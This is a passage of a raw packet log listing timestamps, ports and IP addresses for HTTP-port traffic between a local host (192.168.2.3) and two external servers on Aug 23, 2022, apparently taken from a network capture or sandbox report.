Aug 23, 2022 18:24:03.653803110 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.653822899 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.653851986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.653879881 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.653882027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.653906107 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.653923035 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.653927088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.653948069 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.653958082 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.653973103 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.654021978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.654103994 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.654133081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.654186964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.654198885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.654228926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.654290915 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.654294968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.654330015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.654357910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.654365063 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.654400110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.654406071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.654426098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.654443979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.654460907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.654464960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.654479980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.654491901 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.654524088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.654680014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.655044079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.655077934 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.655107975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.655128956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.655136108 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.655158043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.655177116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.655200005 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.655200958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.655236006 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.655472994 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.655493021 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.655543089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.655546904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.655564070 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.655591965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.655642033 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.655746937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.655790091 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.655925035 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656013012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.656045914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656073093 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656105995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.656106949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656138897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656152010 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.656162977 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656198978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656200886 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.656208992 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.656223059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656245947 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656250954 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.656269073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.656294107 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.656313896 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656338930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656359911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.656361103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656383991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656389952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.656410933 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.656429052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.656591892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656650066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.656658888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656706095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.656754017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.683496952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.683537006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.683562040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.683585882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.683610916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.683635950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.683660984 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.683676958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.683686972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.683711052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.683731079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.683758974 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.683767080 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.683794975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.683816910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.683841944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.683876038 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.683897018 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.684854984 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.684892893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.684920073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.684942961 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.684967041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.684998989 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.685015917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.685040951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.685046911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.685065031 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.685091972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.685096025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.685112953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.685121059 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.685136080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.685157061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.685159922 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.685178041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.685199022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.685204029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.685220957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.685226917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.685246944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.685271978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.685271978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.685300112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.685303926 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.685343981 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.685367107 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.685415030 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.686285019 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.686389923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.687280893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.687367916 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.687746048 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688182116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688285112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.688296080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688374996 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.688417912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688442945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688463926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688486099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688494921 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.688510895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688534975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688549042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.688561916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688579082 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.688585043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688606024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.688608885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688632965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688658953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688662052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.688680887 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688693047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.688704967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688728094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688745022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.688747883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.688781023 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.688802958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.699516058 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.699573040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.699600935 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.699613094 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.699640036 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.699651003 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.699675083 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.699691057 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.699714899 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.699788094 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.699801922 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.699809074 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.699877977 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.700068951 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.700153112 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.700618029 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.700730085 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701107025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701149940 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701193094 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701210976 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701215982 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701240063 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701266050 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701307058 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701324940 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701351881 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701395988 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701420069 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701462984 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701467991 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701500893 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701508045 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701550961 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701561928 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701586008 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701611042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701621056 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701626062 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701647043 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701658964 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701683998 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701709032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701734066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701746941 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701750994 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701755047 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701773882 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701801062 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701831102 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701855898 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701875925 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701880932 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701884031 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701899052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701924086 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701947927 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.701963902 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701967955 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701972961 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.701992035 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702017069 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702040911 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702066898 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702092886 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702101946 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702106953 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702111006 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702132940 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702159882 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702172995 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702178955 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702192068 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702213049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702234030 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702250004 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702275038 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702301025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702311993 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702316046 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702320099 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702343941 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702372074 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702397108 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702406883 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702430010 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702439070 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702454090 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702476025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702486992 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702512026 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702532053 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702548981 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702574968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702584982 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702605963 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702625036 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702644110 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702667952 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702680111 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702691078 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702713966 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702739000 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702775002 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702780008 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702799082 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702884912 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.702939987 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.702963114 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703058004 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703083992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703104019 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.703135014 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703169107 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.703172922 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.703234911 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703259945 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703300953 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.703305960 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.703340054 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703394890 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703438044 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.703479052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703495026 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.703531981 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703541040 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.703563929 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703605890 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.703701973 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.703743935 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703799963 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.703855991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703902006 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703928947 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703937054 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.703941107 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.703967094 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.703984976 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704009056 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704025984 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704119921 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704161882 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704176903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704196930 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704236984 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704248905 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704253912 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704281092 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704305887 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704318047 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704334021 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704381943 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704392910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704425097 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704448938 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704463005 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704467058 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704484940 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704507113 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704529047 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704540014 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704544067 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704564095 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704580069 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704583883 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704597950 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704621077 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704641104 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704662085 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.704673052 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.704677105 CEST	49844	80	192.168.2.3	77.91.103.222
